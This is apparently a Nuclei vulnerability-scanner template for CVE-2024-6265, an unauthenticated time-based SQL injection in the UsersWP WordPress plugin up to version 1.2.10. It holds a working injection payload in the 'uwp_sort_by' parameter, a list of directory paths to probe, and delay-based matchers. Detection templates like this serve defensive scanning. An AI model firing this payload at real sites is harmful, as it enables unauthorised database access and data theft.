UsersWP <= 1.2.10 - Unauthenticated SQL Injection

id: CVE-2024-6265

info:
  name: UsersWP <= 1.2.10 - Unauthenticated SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WordPress contains a time-based SQL Injection caused by insufficient escaping of the 'uwp_sort_by' parameter in all versions up to 1.2.10, letting unauthenticated attackers execute arbitrary SQL queries, exploit requires attacker to control the 'uwp_sort_by' parameter.
  remediation: |
    Update to version 1.2.11 or later.
  impact: |
    Attackers can extract sensitive database information by executing arbitrary SQL queries, leading to data breach.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6265
  metadata:
    verified: true
    max-request: 6
    publicwww-query: "/plugins/userswp/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,userswp,sqli,time-based,unauth,vkev

http:
  - raw:
      - |
        @timeout: 10s
        GET {{path}}?uwp_sort_by=display_name,(SELECT+SLEEP(6))_asc HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - "/users/"
        - "/members/"
        - "/user-list/"
        - "/member-directory/"
        - "/directory/"
        - "/all-users/"

    attack: clusterbomb

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "status_code == 200"
          - 'contains_any(body, "uwp-users", "uwp_page", "wp-content/plugins/userswp")'
        condition: and
# digest: 4b0a0048304602210083b370da7d6774d11afc34aa8a76c9b47a52c51034fa22a0988641c08c4bb152022100d6c7b85923170542d0072ca61d4506ff0c963b1f3a15c1adb881bb8aee19799f:922c64590222798bb761d5b6d8e72950